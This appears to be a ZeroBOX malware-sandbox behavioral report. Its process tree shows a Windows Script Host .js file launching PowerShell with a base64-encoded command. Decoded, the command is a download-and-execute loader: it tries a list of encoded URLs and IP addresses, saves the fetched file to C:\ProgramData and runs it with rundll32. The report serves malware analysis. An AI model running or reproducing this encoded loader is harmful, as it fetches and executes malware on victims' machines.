popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\p6Qyi723hMWX.js

    2552

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABNAGUAbABlAHQAaQBhAG4ARABpAHMAYwBvAG0AZgBvAHIAdABpAG4AZwBsAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBOAFEAQQB1AEEARABJAEEATQBRAEEAMgBBAEMANABBAE8AQQBBAHoAQQBDADQAQQBPAFEAQQB5AEEAQQA9AD0ASwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBaAFEAQgB1AEEASABRAEEAYwBnAEIAMQBBAEcAMABBAEwAZwBCAGoAQQBHADgAQQBiAFEAQgB3AEEARwBFAEEAYgBnAEIANQBBAEEAPQA9ACIAOwAkAFAAcgBlAGQAYQB3AG4AcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQwBBAEcAVQBBAFoAZwBCAGgAQQBHAHcAQQBiAEEAQgBLAEEARwBFAEEAZQBRAEIAMwBBAEcARQBBAGIAQQBCAHIAQQBHAGsAQQBiAGcAQgBuAEEAQwA0AEEAYwB3AEIAagBBAEcAOABBAGQAQQBBAHYAQQBGAEUAQQBaAFEAQgBwAEEARgBVAEEAUQBRAEEAdgBBAEQAUQBBAFQAdwBBAHcAQQBBAD0APQByAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAyAEEARABJAEEATABnAEEAeQBBAEQAQQBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQA0AEEAQwA0AEEATQBRAEEAeQBBAEQAZwBBAEwAdwBCAG0AQQBEAEEAQQBXAGcAQgBMAEEAQwA4AEEAUwBRAEEAPQByAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBnAEEANABBAEMANABBAE0AZwBBAHcAQQBEAFkAQQBMAGcAQQAzAEEARABrAEEATABnAEEAeQBBAEQAVQBBAE4AUQBBAHYAQQBHADQAQQBXAGcAQgBJAEEARABRAEEAVwBRAEEAdgBBAEcAYwBBAFEAUQBBADQAQQBFAHMAQQBUAHcAQQA9AHIAUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAE0AQQBMAGcAQQB5AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AQQBBAHkAQQBDADQAQQBNAFEAQQB6AEEARABZAEEATAB3AEEAeABBAEUAMABBAE4AdwBBAHYAQQBHAGMAQQBPAFEAQQA9AHIAUABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBaAEEAQgBoAEEARwAwAEEAWQBRAEIAdQBBAEgAUQBBAGIAdwBCAGkAQQBHAHcAQQBZAFEAQgB6AEEASABRAEEAVQBBAEIAbABBAEgASQBBAGIAQQBCAGgAQQBIAFEAQQBhAFEAQgAyAEEARwBVAEEATABnAEIAagBBAEcAOABBAGIAQQBCAHMAQQBHAFUAQQBaAHcAQgBsAEEAQwA4AEEATQB3AEIAUABBAEQAWQBBAFMAZwBCAEwAQQBDADgAQQBUAFEAQgBKAEEARwBnAEEAcgBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUATQBBAGIAdwBCAHQAQQBHADAAQQBiAHcAQgB1AEEARgBBAEEAYwBnAEIAdgBBAEcAUQBBAGQAUQBCAGoAQQBHAFUAQQBjAGcAQgB6AEEARwBnAEEAYQBRAEIAdwBBAEMANABBAFkAZwBCAGgAQQBIAEkAQQBMAHcAQQA1AEEARABNAEEAUwBRAEIAeQBBAEMAOABBAE4AdwBCAFUAQQBFAG8AQQBOAHcAQQA9AHIAUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBNAFEAQQAwAEEAQwA4AEEATwBBAEIAQwBBAEgAbwBBAEwAdwBCAHcAQQBIAE0AQQBhAFEAQgBVAEEARwBNAEEATwBBAEIAMABBAEEAPQA9AHIAUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBOAGcAQQA1AEEAQwA4AEEATgB3AEIANABBAEgAWQBBAGIAZwBCAG8AQQBEAEUAQQBXAFEAQQB2AEEASABjAEEAUwBnAEEAeQBBAEgAVQBBAE0AdwBCAEUAQQBBAD0APQByAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAFEAQQAzAEEAQwA0AEEATgB3AEEAdwBBAEMAOABBAFkAdwBCAEUAQQBGAE0AQQBkAFEAQgBIAEEARwBJAEEATAB3AEIAUwBBAEgAYwBBAFYAZwBCAHYAQQBFADAAQQBSAHcAQgBwAEEARwBZAEEAUgB3AEIAVQBBAEEAPQA9ACIAOwAkAFoAbwBuAG8AcABsAGEAYwBlAG4AdABhAGwAaQBhAEUAdQBwAHIAYQBjAHQAaQBjACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBnAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAEEAQQBMAGcAQQB4AEEARABZAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBBAD0APQBjAEEAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBaAFEAQgA0AEEARwBFAEEAYgBRAEIAcABBAEcANABBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQgBJAEEARwA4AEEAYwBnAEIAegBBAEcAVQBBAFkAZwBCAGwAQQBHAEUAQQBiAGcAQQB1AEEARwBFAEEAZABBAEEAPQBjAEEAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFYAQQBHADQAQQBkAFEAQgBpAEEARwBrAEEAYwBRAEIAMQBBAEcAawBBAGQAQQBCAHYAQQBIAFUAQQBjAHcAQgB1AEEARwBVAEEAYwB3AEIAegBBAEMANABBAGMAZwBCAGwAQQBHAGsAQQBjAHcAQgBsAEEAQQA9AD0AYwBBAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABnAEEATABnAEEANQBBAEQAawBBAEwAZwBBAHgAQQBEAEEAQQBOAFEAQQB1AEEARABJAEEATgBRAEEAMABBAEEAPQA9ACIAOwAkAFMAZQBtAGkAbABlAGcAYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABNAEEATgBRAEEAdQBBAEQASQBBAE0AZwBBAHoAQQBDADQAQQBNAFEAQQA0AEEARABVAEEATABnAEEANQBBAEQAYwBBACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAGIAbwBuAGUAdAB0AGEAIABpAG4AIAAkAFAAcgBlAGQAYQB3AG4AcwAgAC0AcwBwAGwAaQB0ACAAIgByAFAAIgApACAAewB0AHIAeQAgAHsAJABNAHUAcwByAG8AbABOAGUAdwBsAGkAbgBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAWgBRAEIAawBBAEcAawBBAFkAUQBCADAAQQBIAEkAQQBlAFEAQQB1AEEARwB3AEEAYQBRAEIAMgBBAEcAVQBBAEoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBvAEEARwBVAEEAWQBRAEIAawBBAEcAUQBBAGMAZwBCAGwAQQBIAE0AQQBjAHcAQgBsAEEASABNAEEATABnAEIAcwBBAEcAOABBAGIAZwBCAGsAQQBHADgAQQBiAGcAQQA9AEoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATwBRAEEAdQBBAEQARQBBAE8AUQBBAHkAQQBDADQAQQBNAGcAQQB3AEEARABFAEEATABnAEEAeQBBAEQAVQBBAE0AQQBBAD0AIgA7ACQAaQByAGkAZABlAHMAYwBlAG4AYwBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADAAQQBIAFUAQQBZAGcAQgAxAEEARwB3AEEAYQBRAEIAawBBAEcAVQBBAGIAZwBCADAAQQBHAEUAQQBkAEEAQgBoAEEAQwA0AEEAWgB3AEIAaABBAEcAMABBAFoAUQBCAHoAQQBBAD0APQBTAE4APQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAGMAQQBiAHcAQgBrAEEARwBRAEEAYQBRAEIAcgBBAEcAawBBAGIAZwBCAEIAQQBHAE0AQQBZAHcAQgBwAEEARwBRAEEAYQBRAEIAbABBAEMANABBAGQAZwBCAHYAQQBIAGsAQQBZAFEAQgBuAEEARwBVAEEAUwBOAD0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBRAEEARwBFAEEAYgBnAEIAagBBAEgASQBBAFoAUQBCAGgAQQBIAFEAQQBZAFEAQgBzAEEARwBjAEEAYQBRAEIAaABBAEMANABBAGMAQQBCAHkAQQBHAFUAQQBjAHcAQgB6AEEAQQA9AD0AUwBOAD0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABNAEEATQBRAEEAdQBBAEQAawBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQA0AEEAQwA0AEEATQBRAEEAeABBAEQAVQBBACIAOwAkAGMAdQBtAHUAbABlAG4AZQBTAHQAeQBsAGEAdABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAbwBuAGUAdAB0AGEAKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABjAHUAbQB1AGwAZQBuAGUAUwB0AHkAbABhAHQAZQAgAC0ATwAgAEMAOgBcAFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAXABzAHQAdQBtAHAAYQBnAGUAcwAuAFMAaABhAG4AZwBoAGEAaQBpAG4AZwA7ACQAVQBuAGcAYQB6AGkAbgBnAFQAZQBwAGgAcgBpAHQAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBADQAQQBDADQAQQBNAFEAQQAwAEEARABJAEEATABnAEEAeQBBAEQAQQBBAE0AUQBBAHUAQQBEAFEAQQBOAFEAQQA9AHAAbAB5AEgAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAegBBAEMANABBAE0AZwBBADAAQQBEAGMAQQBMAGcAQQA1AEEARABjAEEATABnAEEAeABBAEQAZwBBAE0AZwBBAD0AIgA7ACQAYQBjAGUAaQB0AHUAbgBhAE4AbwBuAHMAcABlAGMAdQBsAGEAdABpAHYAZQBsAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGcAQQBMAGcAQQB4AEEARABRAEEATQBRAEEAdQBBAEQARQBBAE4AZwBBADEAQQBDADQAQQBNAGcAQQB3AEEARABVAEEAQQBoAFcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBVAEEASABJAEEAYQBRAEIAagBBAEcAZwBBAGIAQQBCAHYAQQBIAEkAQQBiAHcAQgBsAEEASABRAEEAYQBBAEIAaABBAEcANABBAFoAUQBBAHUAQQBHAHMAQQBhAFEAQgAwAEEARwBNAEEAYQBBAEIAbABBAEcANABBAEEAaABXAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGIAdwBCAHUAQQBHAFEAQQBaAFEAQgB5AEEARwBFAEEAYgBnAEIAMABBAEUAYwBBAGMAZwBCAGgAQQBIAE0AQQBjAHcAQgBqAEEARwBnAEEAWQBRAEIAMABBAEMANABBAGQAUQBCAHUAQQBHAGsAQQBkAGcAQgBsAEEASABJAEEAYwB3AEIAcABBAEgAUQBBAGUAUQBBAD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAcwB0AHUAbQBwAGEAZwBlAHMALgBTAGgAYQBuAGcAaABhAGkAaQBuAGcAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAyADQAOAAxADYANwApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAYwB3AEIAMABBAEgAVQBBAGIAUQBCAHcAQQBHAEUAQQBaAHcAQgBsAEEASABNAEEATABnAEIAVABBAEcAZwBBAFkAUQBCAHUAQQBHAGMAQQBhAEEAQgBoAEEARwBrAEEAYQBRAEIAdQBBAEcAYwBBAEwAQQBCAHQAQQBIAFUAQQBjAHcAQgAwAEEARABzAEEAIgA7ACQAdAByAGkAZwBvAG4AbwBjAGUAcABoAGEAbAB5AEMAbwBuAHQAcgBhAHMAdABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABJAEEATABnAEEAMABBAEQATQBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQB1AEEARABFAEEATgBRAEEAegBBAEEAPQA9AEwAQwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBaAEEAQgBsAEEASABJAEEAYwB3AEIAMABBAEcARQBBAFoAZwBCAG0AQQBDADQAQQBaAEEAQgBsAEEAQQA9AD0ATABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAegBBAEcATQBBAGIAdwBCAHcAQQBIAFUAQQBiAEEAQgB2AEEASABVAEEAYwB3AEIAdQBBAEcAVQBBAGMAdwBCAHoAQQBDADQAQQBjAGcAQgBsAEEARwA0AEEAZABBAEIAaABBAEcAdwBBAGMAdwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAfQB9AA=="

      2692

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf